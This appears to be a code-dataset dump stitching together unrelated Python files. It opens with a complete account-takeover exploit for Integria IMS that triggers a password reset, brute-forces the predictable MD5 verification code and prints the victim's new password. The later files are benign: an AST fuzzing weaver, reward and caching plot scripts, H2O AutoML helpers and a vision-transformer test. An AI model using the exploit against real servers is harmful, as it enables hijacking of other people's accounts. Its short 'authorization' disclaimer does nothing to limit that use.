from optparse import OptionParser
debug = False
# parse the Sitename from the login page HTML text
# the Sitename is the <title> of the page
def getSiteName(htmlText):
startTitle = htmlText.index("<title>")
endTitle = htmlText.index("</title>")
sitename = htmlText[startTitle + len("<title>"):endTitle]
return sitename
# parse the new password from the successful verification code page
def getNewPassword(htmlText):
startFlag = "Your new password is : <b>"
endFlag = "</b></div>"
startNewPass = htmlText.index(startFlag)
endNewPass = htmlText[startNewPass:].index(endFlag)
newPass = htmlText[startNewPass + len(startFlag):startNewPass + endNewPass]
#print htmlText
return newPass
def printMain():
print 'Integria IMS user account takeover script'
print '!!!! DO NOT USE without proper authorization !!!!'
# Start main code
parser = OptionParser('Usage: takeover.py -s [server name or IP] -u [target username]\nExample: takeover.py -s http://192.168.1.45/integria -u root')
# setup option parsing
parser.add_option("-s", "--server", dest="server", help="URL to target, excluding any specific page. Example: http://example.com/integriaims")
parser.add_option("-u", "--username", dest="username", help="Username to takeover")
parser.add_option("-d", "--debug", dest="debug", action="store_true", help="Turn on debug output")
(options, args) = parser.parse_args()
success = False
debug = options.debug
server = options.server
username = options.username
# if no server or username is supplied then tell the operator and exit
if (server is None):
print '[!] You must supply the target IntegriaIMS server hostname or IP address'
print parser.usage
exit()
if (username is None):
print '[!] You must supply a username to takeover'
print parser.usage
exit()
# print the disclaimer and usage information
printMain()
print '[ ] Hijacking account \'' + username + '\' on ' + server
#start by getting the sitename (is the <title> of the default login page)
if (debug):
print "[d] Retrieving sitename..."
r = requests.get(server)
sitename = getSiteName(r.text)
if (debug):
print "[d] Found sitename: " + sitename
#trigger the password recovery process on the Integria server
print "[ ] Triggering password recovery procedure..."
r = requests.get(server + "/index.php?recover=" + username)
if ("Don't close this window:" in r.text):
print "[ ] Password reset process triggered successfully" #Successfully got the server to generate a verificaiton code. Now we can try to brute force it
# loop through each of the 100 possible codes and try it
print "[ ] Generating and trying 100 codes, please wait..."
for x in range(0, 100):
#create the code
m = hashlib.md5()
m.update(sitename + str(x) + username)
testhash = m.hexdigest()
# send the code to the server
r = requests.post(server + '/index.php?recover=' + username, data={'hash' : testhash})
if ('Invalid' not in r.text):
#success, this was the verification code. Print it along with the new password (which is contained in the response HTML page)
print '[+] Success! Account \'' + username + '\' new password: ' + getNewPassword(r.text)
if (debug):
print '[d] Verification code: ' + testhash
success = True
break
# else it wasn't the correct code, loop back around and try the next one
else:
print '[-] Failed to start password reset process'
if (debug):
print '[d] Code=' + str(r.status_code) + ' response text from server=' + r.text
# failure, for whatever reason we didn't reset the password
if (success == False):
print "[-] Password was not found, please try running the script again (is the target version vulnerable?)"
print "[ ] Operations complete"
| StarcoderdataPython |
168340 | <filename>pdsf_py2/pydysofu/fuzz_weaver.py
"""
Core fuzzing functionality.
@author twsswt
"""
import ast
import copy
import inspect
from core_fuzzers import identity
from workflow_transformer import WorkflowTransformer
from drawer import weave_clazz, weave_module, unweave_class, unweave_all_classes, IdentityAspect
_reference_syntax_trees = dict()
def get_reference_syntax_tree(func):
if func not in _reference_syntax_trees:
func_source_lines = inspect.getsourcelines(func)[0]
global_indentation = len(func_source_lines[0]) - len(func_source_lines[0].strip())
for i in range(len(func_source_lines)):
func_source_lines[i] = func_source_lines[i][global_indentation - 1:]
func_source = ''.join(func_source_lines)
_reference_syntax_trees[func] = ast.parse(func_source)
return _reference_syntax_trees[func]
def fuzz_function(reference_function, fuzzer=identity, context=None):
reference_syntax_tree = get_reference_syntax_tree(reference_function)
fuzzed_syntax_tree = copy.deepcopy(reference_syntax_tree)
workflow_transformer = WorkflowTransformer(fuzzer=fuzzer, context=context)
workflow_transformer.visit(fuzzed_syntax_tree)
# Compile the newly mutated function into a module, extract the mutated function code object and replace the
# reference function's code object for this call.
compiled_module = compile(fuzzed_syntax_tree, inspect.getsourcefile(reference_function), 'exec')
reference_function.func_code = compiled_module.co_consts[0]
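# Minimal usage sketch (the workflow function is hypothetical; fuzzers live in core_fuzzers):
#
#   def workflow(self):
#       step_one()
#       step_two()
#
#   fuzz_function(workflow, fuzzer=identity)  # rewrites workflow.func_code with the fuzzed body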
class FuzzingAspect(IdentityAspect):
def __init__(self, fuzzing_advice):
self.fuzzing_advice = fuzzing_advice
def prelude(self, attribute, context, *args, **kwargs):
self.apply_fuzzing(attribute, context)
def apply_fuzzing(self, attribute, context):
# Ensure that advice key is unbound method for instance methods.
if inspect.ismethod(attribute):
reference_function = attribute.im_func
advice_key = getattr(attribute.im_class, attribute.func_name)
else:
reference_function = attribute
advice_key = reference_function
fuzzer = self.fuzzing_advice.get(advice_key, identity)
fuzz_function(reference_function, fuzzer, context)
def fuzz_clazz(clazz, fuzzing_advice):
fuzzing_aspect = FuzzingAspect(fuzzing_advice)
advice = {k: fuzzing_aspect for k in fuzzing_advice.keys()}
weave_clazz(clazz, advice)
def defuzz_class(clazz):
unweave_class(clazz)
def defuzz_all_classes():
unweave_all_classes()
def fuzz_module(mod, advice):
weave_module(mod, advice)
| StarcoderdataPython |
3212911 |
# to plot on the same figure ppo, ddpg and td3 for unused and unsatisfied
# 1 simple
# 2 multiple agent
# plot reward of simple / multi-agent / rsu
"""
# 1***Simple agent *****
import matplotlib.pyplot as plt
import pickle
var = "rc"
pdf_plot = var # R_c, C_o, C_u, k
lstt = [var]#, "C_o", "C_u", "k"]
for pdf_plot in lstt:
with open('z_20ep_resources_'+var+'_ppo.data', 'rb') as filehandle: # 1_ddpg4442C_o #07_five_rc_all_'+var+'.data'
# read the data as binary data stream
ppo = pickle.load(filehandle)
zipped_lists = zip(ppo[0], ppo[1]) # zip of unused shared and own resources
ppo_unused = [x + y for (x, y) in zipped_lists] # sum list
zipped_lists = zip(ppo[2], ppo[3])
ppo_unsatisfied = [x + y for (x, y) in zipped_lists]
with open('z_20ep_resources_'+var+'_ddpg.data', 'rb') as filehandle: # 02_five_fifty_R_c.data
# read the data as binary data stream
ddpg =pickle.load(filehandle)
zipped_lists = zip(ddpg[0], ddpg[1]) # zip of unused shared and own resources
ddpg_unused = [x + y for (x, y) in zipped_lists] # sum list
zipped_lists = zip(ddpg[2], ddpg[3]) # zip of unused shared and own resources
ddpg_unsatisfied = [x + y for (x, y) in zipped_lists] # sum list
with open('z_20ep_resources_'+var+'_td3.data', 'rb') as filehandle: # 1_ddpg4442C_o
# read the data as binary data stream
td3 = pickle.load(filehandle)
zipped_lists = zip(td3[0], td3[1]) # zip of unused shared and own resources
td3_unused = [x + y for (x, y) in zipped_lists] # sum list
zipped_lists = zip(td3[2], td3[3]) # zip of unused shared and own resources
td3_unsatisfied = [x + y for (x, y) in zipped_lists] # sum list
times = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]
plt.plot(times , ppo_unused, color='orange', linestyle='dotted', marker='x' ,label='PPO_unused') # unused shared 'ppo_$Unused$'
plt.plot(times , ddpg_unused, color='red', linestyle='dashed', marker='D' ,label='DDPG_unused') # unused shared
plt.plot(times , td3_unused, color='blue', linestyle='--', marker='2' ,label='TD3_unused') # unused shared
plt.plot(times , ppo_unsatisfied, color='green', linestyle='dotted', marker='s' ,label='PPO_unsatisfied') # unused shared 'ppo_$Unused$'
plt.plot(times , ddpg_unsatisfied, color='pink', linestyle='solid', marker='<' ,label='DDPG_unsatisfied') # unused shared
plt.plot(times , td3_unsatisfied, color='brown', linestyle='--', marker='2' ,label='TD3_unsatisfied') # unused shared
plt.ylabel('Caching Resources', size= 8 ) #resource
plt.xlabel('$'+var+'$', size= 10) #'$'+pdf_plot[para]+'$ ' $'+var+'$ Communication range
plt.xticks((1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20),size = 7)
plt.yticks(size = 7)
plt.grid()
plt.legend()#ncol=1, bbox_to_anchor=(1, 0.5))#c_u
plt.grid()
plt.savefig('zz_caching_'+var+'_g+o_z.pdf') #abbbs_ b_test_five_'+var+'_plot.pdf
#plt.show()
print("EEND")
print("End")
"""
"""
# 2***multi agent *****
import matplotlib.pyplot as plt
import pickle
var = "rc"
pdf_plot = var # R_c, C_o, C_u, k
lstt = [var]#, "C_o", "C_u", "k"]
for pdf_plot in lstt:
with open('z_20ep_multi_agent_'+var+'_ppo.data', 'rb') as filehandle: # 1_ddpg4442C_o #07_five_rc_all_'+var+'.data'
# read the data as binary data stream
ppo = pickle.load(filehandle)
zipped_lists = zip(ppo[0], ppo[1]) # zip of unused shared and own resources
ppo_unused = [x + y for (x, y) in zipped_lists] # sum list
zipped_lists = zip(ppo[2], ppo[3])
ppo_unsatisfied = [x + y for (x, y) in zipped_lists]
with open('z_20ep_multi_agent_'+var+'_ddpg.data', 'rb') as filehandle: # 02_five_fifty_R_c.data
# read the data as binary data stream
ddpg =pickle.load(filehandle)
zipped_lists = zip(ddpg[0], ddpg[1]) # zip of unused shared and own resources
ddpg_unused = [x + y for (x, y) in zipped_lists] # sum list
zipped_lists = zip(ddpg[2], ddpg[3]) # zip of unused shared and own resources
ddpg_unsatisfied = [x + y for (x, y) in zipped_lists] # sum list
with open('z_20ep_multi_agent_'+var+'_td3.data', 'rb') as filehandle: # 1_ddpg4442C_o
# read the data as binary data stream
td3 = pickle.load(filehandle)
zipped_lists = zip(td3[0], td3[1]) # zip of unused shared and own resources
td3_unused = [x + y for (x, y) in zipped_lists] # sum list
zipped_lists = zip(td3[2], td3[3]) # zip of unused shared and own resources
td3_unsatisfied = [x + y for (x, y) in zipped_lists] # sum list
times = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]
plt.plot(times , ppo_unused, color='orange', linestyle='dotted', marker='x' ,label='PPO_unused') # unused shared 'ppo_$Unused$'
plt.plot(times , ddpg_unused, color='red', linestyle='dashed', marker='D' ,label='DDPG_unused') # unused shared
plt.plot(times , td3_unused, color='blue', linestyle='--', marker='2' ,label='TD3_unused') # unused shared
plt.plot(times , ppo_unsatisfied, color='green', linestyle='dotted', marker='s' ,label='PPO_unsatisfied') # unused shared 'ppo_$Unused$'
plt.plot(times , ddpg_unsatisfied, color='pink', linestyle='solid', marker='<' ,label='DDPG_unsatisfied') # unused shared
plt.plot(times , td3_unsatisfied, color='brown', linestyle='--', marker='2' ,label='TD3_unsatisfied') # unused shared
plt.ylabel('Caching Resources', size= 8 ) #resource
plt.xlabel('$'+var+'$', size= 10) #'$'+pdf_plot[para]+'$ ' $'+var+'$ Communication range
plt.xticks((1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20),size = 7)
plt.yticks(size = 7)
plt.grid()
plt.legend()#ncol=1, bbox_to_anchor=(1, 0.5))#c_u
plt.grid()
plt.savefig('zz_multi_caching_'+var+'_g+o_z.pdf') #abbbs_ b_test_five_'+var+'_plot.pdf
#plt.show()
print("End")
"""
"""
# 3***reward simple / multi-agent / rsu *****
import matplotlib.pyplot as plt
import pickle
import numpy as np
var = "k"
pdf_plot = var # R_c, C_o, C_u, k
lstt = [var]#, "C_o", "C_u", "k"]
print("okokokok")
for pdf_plot in lstt:
with open('Reward_ppo.data', 'rb') as filehandle: # 1_ddpg4442C_o #07_five_rc_all_'+var+'.data'
# read the data as binary data stream
single = pickle.load(filehandle)
single = single[0][:219999]
window_width= 100
cumsum_vec = np.cumsum(np.insert(single, 0, 0))
single = (cumsum_vec[window_width:] - cumsum_vec[:-window_width]) / window_width
with open('Reward_multi_agentppo.data', 'rb') as filehandle: # 02_five_fifty_R_c.data
# read the data as binary data stream
multi =pickle.load(filehandle)
multi = multi[0][:219999]
window_width= 100
cumsum_vec = np.cumsum(np.insert(multi, 0, 0))
multi = (cumsum_vec[window_width:] - cumsum_vec[:-window_width]) / window_width
with open('Reward_multi_agent_RSUppo.data', 'rb') as filehandle: # 1_ddpg4442C_o
# read the data as binary data stream
rsu = pickle.load(filehandle)
rsu = rsu[0][:219999]
window_width= 100
cumsum_vec = np.cumsum(np.insert(multi, 0, 0))
multi = (cumsum_vec[window_width:] - cumsum_vec[:-window_width]) / window_width
plt.plot(single, color='orange', linestyle='dotted', marker='x' ,label='Single_agent') # unused shared 'ppo_$Unused$'
plt.plot(multi, color='red', linestyle='dashed', marker='D' ,label='Multi_agent') # unused shared
plt.plot(rsu, color='blue', linestyle='--', marker='2' ,label='Multi_agent_RSU') # unused shared
plt.ylabel('Reward', size= 8 ) #resource
plt.xlabel('Epochs', size= 10) #'$'+pdf_plot[para]+'$ ' $'+var+'$ Communication range
#plt.xticks((1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20),size = 7)
plt.yticks(size = 7)
plt.grid()
plt.legend()#ncol=1, bbox_to_anchor=(1, 0.5))#c_u
plt.grid()
plt.savefig('zz_reward_all.pdf') #abbbs_ b_test_five_'+var+'_plot.pdf
#plt.show()
print("End")
"""
import matplotlib.pyplot as plt
import numpy as np
import pickle
with open('Reward_ppo.data', 'rb') as filehandle: # 1_ddpg4442C_o #07_five_rc_all_'+var+'.data'
# read the data as binary data stream
single = pickle.load(filehandle)
print("LEN SINGLE = ", len(single[0]))
single = single[0][:20000]
single = [ single[xx] for xx in range(len(single)) if xx%20==0 ]
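    # cumulative-sum trick: (cumsum[i+w] - cumsum[i]) / w is the mean of the w samples starting
    # at index i, so the next three lines compute a sliding moving average with window w = 100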
window_width= 100
cumsum_vec = np.cumsum(np.insert(single, 0, 0))
single = (cumsum_vec[window_width:] - cumsum_vec[:-window_width]) / window_width
with open('Reward_multi_agentppo.data', 'rb') as filehandle: # 1_ddpg4442C_o #07_five_rc_all_'+var+'.data'
# read the data as binary data stream
multi = pickle.load(filehandle)
print("LEN multi = ", len(multi[0]))
multi = multi[0][:20000]
multi = [ multi[xx] for xx in range(len(multi)) if xx%20==0 ]
window_width= 100
cumsum_vec = np.cumsum(np.insert(multi, 0, 0))
multi = (cumsum_vec[window_width:] - cumsum_vec[:-window_width]) / window_width
with open('Reward_multi_agent_RSUppo.data', 'rb') as filehandle: # 1_ddpg4442C_o #07_five_rc_all_'+var+'.data'
# read the data as binary data stream
rsu = pickle.load(filehandle)
print("LEN rsu = ", len(rsu[0]))
rsu = rsu[0][:20000]
rsu = [ rsu[xx] for xx in range(len(rsu)) if xx%20==0 ]
window_width= 100
cumsum_vec = np.cumsum(np.insert(rsu, 0, 0))
rsu = (cumsum_vec[window_width:] - cumsum_vec[:-window_width]) / window_width
print("LEN SINGLE = ", len(single))
print("LEN multi = ", len(multi))
print("LEN rsu = ", len(rsu))
x = np.arange(len(single))
times = range(len(single))
# plot our data along a line
fig,ax = plt.subplots()
ax.plot(times, single, '-', color='tab:blue', linestyle='dotted', marker='x' ,label='Single_agent')
ax.plot(times, multi, '-', color='tab:orange', linestyle='dashed', marker='D' ,label='Multi_agent')
ax.plot(times, rsu, '-', color='tab:red', linestyle='--', marker='2' ,label='Multi_agent_RSU')
ax.set_title('')
plt.xticks(np.arange(min(x), max(x)+1, 200)) # [2,2,2,2,2,2,2,2,2,2,2,2,2,2,2]
plt.xlabel('Epochs', size= 10)
ax.set_ylabel('Reward')
# create a confidence band of +/- 10% error
y_lower = [i - 0.1 * i for i in single]
y_upper = [i + 0.1 * i for i in single]
y_lower_multi = [i - 0.1 * i for i in multi]
y_upper_multi = [i + 0.1 * i for i in multi]
y_lower_rsu = [i - 0.1 * i for i in rsu]
y_upper_rsu= [i + 0.1 * i for i in rsu]
# plot our confidence band
ax.fill_between(times, y_lower, y_upper, alpha=0.2, color='tab:blue')
ax.fill_between(times, y_lower_multi, y_upper_multi, alpha=0.2, color='tab:orange')
ax.fill_between(times, y_lower_rsu, y_upper_rsu, alpha=0.2, color='tab:red')
print("min = ", min(x))
print("max = ", max(x))
print("len x = ", len(x))
plt.legend()
plt.grid()
plt.savefig('zz_reward_all.pdf')
plt.show()
#"""
| StarcoderdataPython |
17098 | import h2o
from h2o.base import Keyed
from h2o.exceptions import H2OValueError
from h2o.job import H2OJob
from h2o.model import ModelBase
from h2o.utils.typechecks import assert_is_type, is_type
class H2OAutoMLBaseMixin:
def predict(self, test_data):
"""
Predict on a dataset.
:param H2OFrame test_data: Data on which to make predictions.
:returns: A new H2OFrame of predictions.
:examples:
>>> # Set up an H2OAutoML object
>>> aml = H2OAutoML(max_runtime_secs=30)
>>> # Launch an H2OAutoML run
>>> aml.train(y=y, training_frame=train)
>>> # Predict with top model from AutoML Leaderboard on a H2OFrame called 'test'
>>> aml.predict(test)
>>>
>>> # Get AutoML object by `project_name`
>>> get_aml = h2o.automl.get_automl(aml.project_name)
>>> # Predict with top model from AutoML Leaderboard on a H2OFrame called 'test'
>>> get_aml.predict(test)
"""
return self.leader.predict(test_data)
# ---------------------------------------------------------------------------
# Download POJO/MOJO with AutoML
# ---------------------------------------------------------------------------
def download_pojo(self, path="", get_genmodel_jar=False, genmodel_name=""):
"""
Download the POJO for the leader model in AutoML to the directory specified by path.
If path is an empty string, then dump the output to screen.
:param path: An absolute path to the directory where POJO should be saved.
:param get_genmodel_jar: if True, then also download h2o-genmodel.jar and store it in folder ``path``.
:param genmodel_name: Custom name of genmodel jar
:returns: name of the POJO file written.
"""
return h2o.download_pojo(self.leader, path, get_jar=get_genmodel_jar, jar_name=genmodel_name)
def download_mojo(self, path=".", get_genmodel_jar=False, genmodel_name=""):
"""
Download the leader model in AutoML in MOJO format.
:param path: the path where MOJO file should be saved.
:param get_genmodel_jar: if True, then also download h2o-genmodel.jar and store it in folder ``path``.
:param genmodel_name: Custom name of genmodel jar
:returns: name of the MOJO file written.
"""
return ModelBase.download_mojo(self.leader, path, get_genmodel_jar, genmodel_name)
@property
def project_name(self):
"""
Retrieve a string indicating the project_name of the automl instance to retrieve.
:return: a string containing the project_name
"""
pass
@property
def leader(self):
"""
Retrieve the top model from an H2OAutoML object
:return: an H2O model
:examples:
>>> # Set up an H2OAutoML object
>>> aml = H2OAutoML(max_runtime_secs=30)
>>> # Launch an AutoML run
>>> aml.train(y=y, training_frame=train)
>>> # Get the best model in the AutoML Leaderboard
>>> aml.leader
>>>
>>> # Get AutoML object by `project_name`
>>> get_aml = h2o.automl.get_automl(aml.project_name)
>>> # Get the best model in the AutoML Leaderboard
>>> get_aml.leader
"""
pass
@property
def leaderboard(self):
"""
Retrieve the leaderboard from an H2OAutoML object
:return: an H2OFrame with model ids in the first column and evaluation metric in the second column sorted
by the evaluation metric
:examples:
>>> # Set up an H2OAutoML object
>>> aml = H2OAutoML(max_runtime_secs=30)
>>> # Launch an AutoML run
>>> aml.train(y=y, training_frame=train)
>>> # Get the AutoML Leaderboard
>>> aml.leaderboard
>>>
>>> # Get AutoML object by `project_name`
>>> get_aml = h2o.automl.get_automl(aml.project_name)
>>> # Get the AutoML Leaderboard
>>> get_aml.leaderboard
"""
pass
@property
def training_info(self):
"""
Expose the name/value columns of `event_log` as a simple dictionary, for example `start_epoch`, `stop_epoch`, ...
See :func:`event_log` to obtain a description of those key/value pairs.
:return: a dictionary with event_log['name'] column as keys and event_log['value'] column as values.
"""
pass
@property
def event_log(self):
"""
Retrieve the backend event log from an H2OAutoML object
:return: an H2OFrame with detailed events occurred during the AutoML training.
"""
pass
def get_leaderboard(self, extra_columns=None):
"""
Retrieve the leaderboard.
Contrary to the default leaderboard attached to the instance, this one can return columns other than the metrics.
:param extra_columns: a string or a list of string specifying which optional columns should be added to the leaderboard. Defaults to None.
Currently supported extensions are:
- 'ALL': adds all columns below.
- 'training_time_ms': column providing the training time of each model in milliseconds (doesn't include the training of cross validation models).
- 'predict_time_per_row_ms`: column providing the average prediction time by the model for a single row.
- 'algo': column providing the algorithm name for each model.
:return: An H2OFrame representing the leaderboard.
:examples:
>>> aml = H2OAutoML(max_runtime_secs=30)
>>> aml.train(y=y, training_frame=train)
>>> lb_all = aml.get_leaderboard('ALL')
>>> lb_custom = aml.get_leaderboard(['predict_time_per_row_ms', 'training_time_ms'])
>>> lb_custom_sorted = lb_custom.sort(by='predict_time_per_row_ms')
"""
assert isinstance(self, Keyed)
return _fetch_leaderboard(self.key, extra_columns)
def get_best_model(self, algorithm=None, criterion=None):
"""
Get best model of a given family/algorithm for a given criterion from an AutoML object.
:param algorithm: One of "basemodel", "deeplearning", "drf", "gbm", "glm", "stackedensemble", "xgboost".
If None, pick the best model regardless of the algorithm.
:param criterion: Criterion can be one of the metrics reported in leaderboard. If set to None, the same ordering
as in the leaderboard will be used.
            Available criteria:
- Regression metrics: deviance, rmse, mse, mae, rmsle
- Binomial metrics: auc, logloss, aucpr, mean_per_class_error, rmse, mse
- Multinomial metrics: mean_per_class_error, logloss, rmse, mse
The following additional leaderboard information can be also used as a criterion:
- 'training_time_ms': column providing the training time of each model in milliseconds (doesn't include the training of cross validation models).
- 'predict_time_per_row_ms`: column providing the average prediction time by the model for a single row.
:return: An H2OModel or None if no model of a given family is present
:examples:
>>> # Set up an H2OAutoML object
>>> aml = H2OAutoML(max_runtime_secs=30)
>>> # Launch an AutoML run
>>> aml.train(y=y, training_frame=train)
>>> gbm = aml.get_best_model("gbm")
"""
from h2o.exceptions import H2OValueError
def _get_models(leaderboard):
return [m[0] for m in
leaderboard["model_id"].as_data_frame(use_pandas=False, header=False)]
higher_is_better = ["auc", "aucpr"]
assert_is_type(algorithm, None, str)
assert_is_type(criterion, None, str)
if criterion is not None:
criterion = criterion.lower()
if "deviance" == criterion:
criterion = "mean_residual_deviance"
if algorithm is not None:
if algorithm.lower() not in ("basemodel", "deeplearning", "drf", "gbm",
"glm", "stackedensemble", "xgboost"):
raise H2OValueError("Algorithm \"{}\" is not supported!".format(algorithm))
algorithm = algorithm.lower()
extra_cols = ["algo"]
if criterion in ("training_time_ms", "predict_time_per_row_ms"):
extra_cols.append(criterion)
leaderboard = h2o.automl.get_leaderboard(self, extra_columns=extra_cols)
leaderboard = leaderboard if algorithm is None else (
leaderboard[leaderboard["algo"].tolower() == algorithm, :] if algorithm != "basemodel"
else leaderboard[leaderboard["algo"].tolower() != "stackedensemble", :])
if leaderboard.nrow == 0:
return None
if criterion is None:
return h2o.get_model(leaderboard[0, "model_id"])
if criterion not in leaderboard.columns:
raise H2OValueError("Criterion \"{}\" is not present in the leaderboard!".format(criterion))
models_in_default_order = _get_models(leaderboard)
sorted_lb = leaderboard.sort(by=criterion, ascending=criterion not in higher_is_better)
selected_models = _get_models(sorted_lb[sorted_lb[criterion] == sorted_lb[0, criterion]])
picked_model = [model for model in models_in_default_order if model in selected_models][0]
return h2o.get_model(picked_model)
def _fetch_leaderboard(aml_id, extensions=None):
assert_is_type(extensions, None, str, [str])
extensions = ([] if extensions is None
else [extensions] if is_type(extensions, str)
else extensions)
resp = h2o.api("GET /99/Leaderboards/%s" % aml_id, data=dict(extensions=extensions))
dest_key = resp['project_name'].split('@', 1)[0]+"_custom_leaderboard"
return _fetch_table(resp['table'], key=dest_key, progress_bar=False)
def _fetch_table(table, key=None, progress_bar=True):
try:
# Intentionally mask the progress bar here since showing multiple progress bars is confusing to users.
# If any failure happens, revert back to user's original setting for progress and display the error message.
ori_progress_state = H2OJob.__PROGRESS_BAR__
H2OJob.__PROGRESS_BAR__ = progress_bar
# Parse leaderboard H2OTwoDimTable & return as an H2OFrame
fr = h2o.H2OFrame(table.cell_values, destination_frame=key, column_names=table.col_header, column_types=table.col_types)
return h2o.assign(fr[1:], key) # removing index and reassign id to ensure persistence on backend
finally:
H2OJob.__PROGRESS_BAR__ = ori_progress_state
def _fetch_state(aml_id, properties=None, verbosity=None):
state_json = h2o.api("GET /99/AutoML/%s" % aml_id, data=dict(verbosity=verbosity))
project_name = state_json["project_name"]
if project_name is None:
raise H2OValueError("No AutoML instance with id {}.".format(aml_id))
leaderboard_list = [key["name"] for key in state_json['leaderboard']['models']]
leader_id = leaderboard_list[0] if (leaderboard_list is not None and len(leaderboard_list) > 0) else None
should_fetch = lambda prop: properties is None or prop in properties
leader = None
if should_fetch('leader'):
leader = h2o.get_model(leader_id) if leader_id is not None else None
leaderboard = None
if should_fetch('leaderboard'):
leaderboard = _fetch_table(state_json['leaderboard_table'], key=project_name+"_leaderboard", progress_bar=False)
event_log = None
if should_fetch('event_log'):
event_log = _fetch_table(state_json['event_log_table'], key=project_name+"_eventlog", progress_bar=False)
return dict(
project_name=project_name,
json=state_json,
leader_id=leader_id,
leader=leader,
leaderboard=leaderboard,
event_log=event_log,
)
| StarcoderdataPython |
1694552 | import torch
import pdb
import transformer
from transformer import VisionTransformer, VisionTransformerUpHead
from transformer import config
backbone_arg = config.model['backbone']
decode_head_arg = config.model['decode_head']
pdb.set_trace()
model = VisionTransformer(model_name='vit_large_patch16_384', **backbone_arg).to('cuda:1')
decoder_head = VisionTransformerUpHead(**decode_head_arg).to('cuda:1')
tmp = torch.rand((1,3,256,256), device='cuda:1')
output = model(tmp)
output_2 = decoder_head(output)
print(output[-1].shape)
print(output_2.shape) | StarcoderdataPython |